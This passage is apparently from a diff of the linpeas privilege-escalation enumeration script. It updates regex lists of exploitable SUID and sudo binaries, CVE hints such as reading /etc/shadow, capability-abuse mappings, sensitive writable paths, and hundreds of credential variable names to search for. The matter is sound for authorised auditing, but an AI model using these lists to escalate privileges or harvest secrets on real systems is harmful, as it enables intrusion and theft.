sidG2="/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/helper$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_cap_ubertooth_one$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/load_osxfuse$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpc$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lpr$|/lprm$|/lpset$|/lxc-user-nic$|/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount$|/mount.cifs$|/mount.ecryptfs_private$|/mount.nfs$|/mount.nfs4$|/mount_osxfuse$|/mtr$|/mutt_dotlock$" sidG3="/ncsa_auth$|/netpr$|/netkit-rcp$|/netkit-rlogin$|/netkit-rsh$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/nvmmctl$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/pmap$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pstat$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/rcmd|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/sliplogin|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/sysstat$|/systat$" sidG4="/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/ulog-helper$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/VBoxHeadless$|/VBoxNetAdpCtl$|/VBoxNetDHCP$|/VBoxNetNAT$|/VBoxSDL$|/VBoxVolInfo$|/VirtualBoxVM$|/vmstat$|/vmware-authd$|/vmware-user-suid-wrapper$|/vmware-vmx$|/vmware-vmx-debug$|/vmware-vmx-stats$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$|/yppasswd$" @@ -340,16 +362,27 @@ sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" #To update sidVB: curl https://github.com/GTFOBins/GTFOBins.github.io/tree/master/_gtfobins 2>/dev/null | grep 'href="/GTFOBins/' | grep '.md">' | awk -F 'title="' '{print $2}' | cut -d '"' -f1 | cut -d "." -f1 | sed -e 's,^,/,' | sed -e 's,$,\$,' | tr '\n' '|' -sidVB='/apt-get$|/apt$|/ar$|/aria2c$|/arp$|/ash$|/at$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bpftrace$|/bridge$|/bundler$|/busctl$|/busybox$|/byebug$|/cancel$|/capsh$|/cat$|/certbot$|/check_by_ssh$|/check_cups$|/check_log$|/check_memory$|/check_raid$|/check_ssl_cert$|/check_statusfile$|/chmod$|/chown$|/chroot$|/cobc$|/column$|/comm$|/composer$|/cowsay$|/cowthink$|/cp$|/cpan$|/cpio$|/cpulimit$|/crash$|/crontab$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmesg$|/dmsetup$|/dnf$|/docker$|/dpkg$|/dvips$|/easy_install$|/eb$|/ed$|/emacs$|/env$|/eqn$|/ex$|/exiftool$|/expand$|/expect$|/facter$|/file$|/find$|/finger$|/flock$|/fmt$|/fold$|/ftp$|/gawk$|/gcc$|/gdb$|/gem$|/genisoimage$|/ghc$|/ghci$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/irb$|/jjs$|/join$|/journalctl$|/jq$|/jrunscript$|/ksh$|/ksshell$' -sidVB2='/latex$|/ld$|/ldconfig$|/less$|/logsave$|/look$|/ltrace$|/lua$|/lualatex$|/luatex$|/lwp-download$|/lwp-request$|/mail$|/make$|/man$|/mawk$|/more$|/mount$|/mtr$|/mv$|/mysql$|/nano$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/npm$|/nroff$|/nsenter$|/octave$|/od$|/openssl$|/openvpn$|/openvt$|/paste$|/pdb$|/pdflatex$|/pdftex$|/perl$|/pg$|/php$|/pic$|/pico$|/pip$|/pkexec$|/pkg$|/pr$|/pry$|/psql$|/puppet$|/python$|/rake$|/readelf$|/red$|/redcarpet$|/restic$|/rev$|/rlogin$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/ruby$|/run-mailcap$|/run-parts$|/rview$|/rvim$|/scp$|/screen$|/script$|/sed$|/service$|/setarch$|/sftp$|/sg$|/shuf$|/slsh$|/smbclient$|/snap$|/socat$|/soelim$|/sort$|/split$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/ssh$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/su$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tcpdump$|/tee$|/telnet$|/tex$|/tftp$|/time$|/timeout$|/tmux$|/top$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/valgrind$|/vi$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/virsh$|/watch$|/wc$|/wget$|/whois$|/wish$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xxd$|/xz$|/yelp$|/yum$|/zip$|/zsh$|/zsoelim$|/zypper$' +sidVB='/ar$|/aria2c$|/arj$|/arp$|/as$|/ash$|/atobm$|/awk$|/base32$|/base64$|/basenc$|/bash$|/bridge$|/busybox$|/byebug$|/bzip2$|/capsh$|/cat$|/chmod$|/chown$|/chroot$|/cmp$|/column$|/comm$|/composer$|/cp$|/cpio$|/cpulimit$|/csh$|/csplit$|/csvtool$|/cupsfilter$|/curl$|/cut$|/dash$|/date$|/dd$|/dialog$|/diff$|/dig$|/dmsetup$|/docker$|/dosbox$|/dvips$|/ed$|/emacs$|/env$|/eqn$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gawk$|/gcore$|/gdb$|/gimp$|/git$|/grep$|/gtester$|/gzip$|/hd$|/head$|/hexdump$|/highlight$|/hping3$|/iconv$|/iftop$|/install$|/ionice$|/ip$|/jjs$|/join$|/jq$|/jrunscript$|/ksh$|/ksshell$|/latex$|/ldconfig$|/less$|/logsave$|/look$|/lua$|/lualatex$|/luatex$|/make$|/mawk$|/more$|/msgattrib$|/msgcat$|/msgconv$|/msgfilter$|/msgmerge$' +sidVB2='/msguniq$|/mv$|/mysql$|/nano$|/nasm$|/nawk$|/nc$|/nice$|/nl$|/nmap$|/node$|/nohup$|/octave$|/od$|/openssl$|/openvpn$|/paste$|/pdflatex$|/pdftex$|/perl$|/pg$|/php$|/pic$|/pico$|/pr$|/pry$|/python$|/rake$|/readelf$|/restic$|/rev$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/run-parts$|/rview$|/rvim$|/scp$|/sed$|/setarch$|/shuf$|/slsh$|/socat$|/soelim$|/sort$|/sqlite3$|/ss$|/ssh-keygen$|/ssh-keyscan$|/start-stop-daemon$|/stdbuf$|/strace$|/strings$|/sysctl$|/systemctl$|/tac$|/tail$|/tar$|/taskset$|/tbl$|/tclsh$|/tee$|/telnet$|/tex$|/tftp$|/tic$|/time$|/timeout$|/troff$|/ul$|/unexpand$|/uniq$|/unshare$|/update-alternatives$|/uudecode$|/uuencode$|/view$|/vigr$|/vim$|/vimdiff$|/vipw$|/watch$|/wc$|/wget$|/whiptail$|/xargs$|/xelatex$|/xetex$|/xmodmap$|/xmore$|/xxd$|/xz$|/zip$|/zsh$|/zsoelim$' cfuncs='file|free|main|more|read|split|write' -sudoVB=" \*|env_keep\+=LD_PRELOAD|apt-get$|apt$|aria2c$|arp$|ash$|awk$|base64$|bash$|busybox$|cat$|chmod$|chown$|cp$|cpan$|cpulimit$|crontab$|csh$|curl$|cut$|dash$|date$|dd$|diff$|dmesg$|dmsetup$|dnf$|docker$|dpkg$|easy_install$|ed$|emacs$|env$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gdb$|gimp$|git$|grep$|head$|ionice$|ip$|irb$|jjs$|journalctl$|jq$|jrunscript$|ksh$|ld.so$|less$|logsave$|ltrace$|lua$|mail$|make$|man$|more$|mount$|mtr$|mv$|mysql$|nano$|nc$|nice$|nl$|nmap$|node$|od$|openssl$|perl$|pg$|php$|pic$|pico$|pip$|puppet$|python$|readelf$|red$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rvim$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|smbclient$|socat$|sort$|sqlite3$|ssh$|start-stop-daemon$|stdbuf$|strace$|systemctl$|tail$|tar$|taskset$|tclsh$|tcpdump$|tee$|telnet$|tftp$|time$|timeout$|tmux$|ul$|unexpand$|uniq$|unshare$|vi$|vim$|watch$|wget$|wish$|xargs$|xxd$|yum$|zip$|zsh$|zypper$" +sudoVB1=" \*|env_keep\+=LD_PRELOAD|ansible-playbook$|apt-get$|apt$|ar$|aria2c$|arj$|arp$|as$|ash$|at$|atobm$|awk$|base32$|base64$|basenc$|bash$|bpftrace$|bridge$|bundler$|busctl$|busybox$|byebug$|bzip2$|c89$|c99$|capsh$|cat$|certbot$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|chown$|chroot$|cmp$|cobc$|column$|comm$|composer$|cowsay$|cowthink$|cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|csh$|csplit$|csvtool$|cupsfilter$|curl$|cut$|dash$|date$|dd$|dialog$|diff$|dig$|dmesg$|dmidecode$|dmsetup$|dnf$|docker$|dosbox$|dpkg$|dvips$|easy_install$|eb$|ed$|emacs$|env$|eqn$|ex$|exiftool$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gawk$|gcc$|gcore$|gdb$|gem$|genisoimage$|ghc$|ghci$|gimp$|git$|grep$|gtester$|gzip$|hd$|head$|hexdump$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|ip$|irb$|jjs$|join$|journalctl$|jq$|jrunscript$|knife$|ksh$|ksshell$|latex$|ldconfig$|less$|ln$|loginctl$|logsave$|look$|ltrace$|lua$|lualatex$|luatex$|lwp-download$|lwp-request$|mail$|make$|man$|mawk$|more$|mount$" +sudoVB2="msgattrib$|msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|mtr$|mv$|mysql$|nano$|nasm$|nawk$|nc$|neofetch$|nice$|nl$|nmap$|node$|nohup$|npm$|nroff$|nsenter$|octave$|od$|openssl$|openvpn$|openvt$|paste$|pdb$|pdflatex$|pdftex$|perl$|pg$|php$|pic$|pico$|pip$|pkexec$|pkg$|pr$|pry$|psql$|puppet$|python$|rake$|readelf$|red$|redcarpet$|restic$|rev$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rview$|rvim$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|sg$|shuf$|slsh$|smbclient$|snap$|socat$|soelim$|sort$|split$|sqlite3$|ss$|ssh-keygen$|ssh-keyscan$|ssh$|start-stop-daemon$|stdbuf$|strace$|strings$|su$|sysctl$|systemctl$|systemd-resolve$|tac$|tail$|tar$|taskset$|tbl$|tclsh$|tcpdump$|tee$|telnet$|tex$|tftp$|tic$|time$|timedatectl$|timeout$|tmux$|top$|troff$|ul$|unexpand$|uniq$|unshare$|update-alternatives$|uudecode$|uuencode$|valgrind$|vi$|view$|vigr$|vim$|vimdiff$|vipw$|virsh$|watch$|wc$|wget$|whiptail$|wish$|xargs$|xelatex$|xetex$|xmodmap$|xmore$|xxd$|xz$|yarn$|yum$|zip$|zsh$|zsoelim$|zypper$" sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|NOPASSWD|SETENV|/apache2|/cryptsetup|/mount" sudoG="NOEXEC" -sudocapsB="/apt-get|/apt|/aria2c|/arp|/ash|/awk|/base64|/bash|/busybox|/cat|/chmod|/chown|/cp|/cpan|/cpulimit|/crontab|/csh|/curl|/cut|/dash|/date|/dd|/diff|/dmesg|/dmsetup|/dnf|/docker|/dpkg|/easy_install|/ed|/emacs|/env|/expand|/expect|/facter|/file|/find|/flock|/fmt|/fold|/ftp|/gdb|/gimp|/git|/grep|/head|/ionice|/ip|/irb|/jjs|/journalctl|/jq|/jrunscript|/ksh|/ld.so|/less|/logsave|/ltrace|/lua|/mail|/make|/man|/more|/mount|/mtr|/mv|/mysql|/nano|/nc|/nice|/nl|/nmap|/node|/od|/openssl|/perl|/pg|/php|/pic|/pico|/pip|/puppet|/python|/readelf|/red|/rlwrap|/rpm|/rpmquery|/rsync|/ruby|/run-mailcap|/run-parts|/rvim|/scp|/screen|/script|/sed|/service|/setarch|/sftp|/smbclient|/socat|/sort|/sqlite3|/ssh|/start-stop-daemon|/stdbuf|/strace|/systemctl|/tail|/tar|/taskset|/tclsh|/tcpdump|/tee|/telnet|/tftp|/time|/timeout|/tmux|/ul|/unexpand|/uniq|/unshare|/vi|/vim|/watch|/wget|/wish|/xargs|/xxd|/yum|/zip|/zsh|/zypper" -capsB="=ep|cap_chown|cap_dac_override|cap_dac_read_search|cap_setuid|sys_admin|sys_ptrace|sys_module" +capsVB="cap_sys_admin:mount|python \ +cap_sys_ptrace:python \ +cap_sys_module:kmod|python \ +cap_dac_override:python|vim \ +cap_chown:chown|python \ +cap_former:chown|python \ +cap_setuid:gdb|node|perl|php|python|ruby|rview|rvim|view|vim|vimdiff \ +cap_setgid:gdb|node|perl|php|python|ruby|rview|rvim|view|vim|vimdiff \ +cap_net_raw:python|tcpdump" + + +capsB="=ep|cap_chown|cap_former|cap_setfcap|cap_dac_override|cap_dac_read_search|cap_setuid|cap_setgid|cap_kill|cap_net_bind_service|cap_net_raw|cap_net_admin|cap_sys_admin|cap_sys_ptrace|cap_sys_module" containercapsB="sys_admin|sys_ptrace|sys_module|dac_read_search|dac_override" OLDPATH=$PATH @@ -361,7 +394,7 @@ ADDPATH=":/usr/local/sbin\ :/bin" spath=":$PATH" for P in $ADDPATH; do - if [ ! -z "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi + if [ "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi done # test if sed supports -E or -r @@ -377,30 +410,31 @@ if [ $? -ne 0 ] ; then fi writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$" -writeVB="/etc/anacrontab|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|"`echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g'` #Add Path but remove simple dot in PATH +writeVB="/etc/anacrontab|/etc/apt/apt.conf.d|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/skey/|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/cron/tabs/|/usr/lib/systemd|/systemd/system|/var/db/yubikey/|/var/spool/anacron|/var/spool/cron/crontabs|"$(echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g') #Add Path but remove simple dot in PATH if [ "$MACPEAS" ]; then sh_usrs="ImPoSSssSiBlEee" nosh_usrs="ImPoSSssSiBlEee" dscl . list /Users | while read uname; do - ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` - if [ "`grep \"$ushell\" /etc/shells`" ]; then sh_usrs="$sh_usrs|$uname"; else nosh_usrs="$nosh_usrs|$uname"; fi + ushell=$(dscl . -read "/Users/$uname" UserShell | cut -d " " -f2) + if grep -q \"$ushell\" /etc/shells; then sh_usrs="$sh_usrs|$uname"; else nosh_usrs="$nosh_usrs|$uname"; fi done else - sh_usrs=`cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/' | sed 's/|sys|/|sys[\\\s:]|^sys$|/' | sed 's/|daemon|/|daemon[\\\s:]|^daemon$|/'`"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere - nosh_usrs=`cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/'`"ImPoSSssSiBlEee" + sh_usrs=$(cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/' | sed 's/|sys|/|sys[\\\s:]|^sys$|/' | sed 's/|daemon|/|daemon[\\\s:]|^daemon$|/')"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere + nosh_usrs=$(cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/')"ImPoSSssSiBlEee" fi -knw_usrs='daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+' -USER=`whoami 2>/dev/null || echo "UserUnknown"` +knw_usrs='_amavisd|_analyticsd|_appinstalld|_appleevents|_applepay|_appowner|_appserver|_appstore|_ard|_assetcache|_astris|_atsserver|_avbdeviced|_calendar|_captiveagent|_ces|_clamav|_cmiodalassistants|_coreaudiod|_coremediaiod|_coreml|_ctkd|_cvmsroot|_cvs|_cyrus|_datadetectors|_demod|_devdocs|_devicemgr|_diskimagesiod|_displaypolicyd|_distnote|_dovecot|_dovenull|_dpaudio|_driverkit|_eppc|_findmydevice|_fpsd|_ftp|_fud|_gamecontrollerd|_geod|_hidd|_iconservices|_installassistant|_installcoordinationd|_installer|_jabber|_kadmin_admin|_kadmin_changepw|_knowledgegraphd|_krb_anonymous|_krb_changepw|_krb_kadmin|_krb_kerberos|_krb_krbtgt|_krbfast|_krbtgt|_launchservicesd|_lda|_locationd|_logd|_lp|_mailman|_mbsetupuser|_mcxalr|_mdnsresponder|_mobileasset|_mysql|_nearbyd|_netbios|_netstatistics|_networkd|_nsurlsessiond|_nsurlstoraged|_oahd|_ondemand|_postfix|_postgres|_qtss|_reportmemoryexception|_rmd|_sandbox|_screensaver|_scsd|_securityagent|_softwareupdate|_spotlight|_sshd|_svn|_taskgated|_teamsserver|_timed|_timezone|_tokend|_trustd|_trustevaluationagent|_unknown|_update_sharing|_usbmuxd|_uucp|_warmd|_webauthserver|_windowserver|_www|_wwwproxy|_xserverdocs|daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+' +USER=$(whoami 2>/dev/null || echo "UserUnknown") if [ ! "$HOME" ]; then if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home else HOME="/home/$USER"; fi fi -Groups="ImPoSSssSiBlEee"`groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|'` +Groups="ImPoSSssSiBlEee"$(groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|') #This variables are dived in several different ones because NetBSD required it -pwd_inside_history="7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp|^ssh|steghide|@" +pwd_inside_history="enable_autologin|7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp|^ssh|steghide|@|KEY=|TOKEN=|BEARER=|Authorization:" + pwd_in_variables1="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID" pwd_in_variables2="AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID" pwd_in_variables3="CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION" @@ -413,32 +447,32 @@ pwd_in_variables9="S3_KEY_APP_LOGS|S3_KEY_ASSETS|S3_PHOTO_BUCKET|S3_SECRET_APP_L 